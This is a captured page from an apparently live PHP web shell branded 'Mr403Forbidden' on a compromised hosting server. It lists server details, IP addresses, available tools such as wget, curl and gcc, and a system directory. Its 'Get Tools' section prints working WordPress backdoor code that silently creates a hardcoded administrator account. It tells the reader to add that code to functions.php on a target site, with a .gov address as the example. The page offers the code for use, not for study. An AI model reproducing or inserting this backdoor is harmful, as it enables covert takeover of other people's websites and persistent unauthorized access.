./Mr403Forbidden

:/usr/lib/python3.6/site-packages/isc/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__pycache__ dir 2025-11-08 0:26 - root/root s---------
__init__.py file 2025-11-06 7:39 937 B root/root s---------
checkds.py file 2025-11-06 7:39 6.79 KB root/root s---------
coverage.py file 2025-11-06 7:39 9.75 KB root/root s---------
dnskey.py file 2025-11-06 7:39 16.03 KB root/root s---------
eventlist.py file 2025-11-06 7:39 5.71 KB root/root s---------
keydict.py file 2025-11-06 7:39 2.78 KB root/root s---------
keyevent.py file 2025-11-06 7:39 2.76 KB root/root s---------
keymgr.py file 2025-11-06 7:39 6.35 KB root/root s---------
keyseries.py file 2025-11-06 7:39 8.52 KB root/root s---------
keyzone.py file 2025-11-06 7:39 1.94 KB root/root s---------
parsetab.py file 2025-11-06 7:43 7.87 KB root/root s---------
policy.py file 2025-11-06 7:39 25.8 KB root/root s---------
rndc.py file 2025-11-06 7:39 6.54 KB root/root s---------
utils.py file 2025-11-06 7:39 2.16 KB root/root s---------

© ./Mr403Forbidden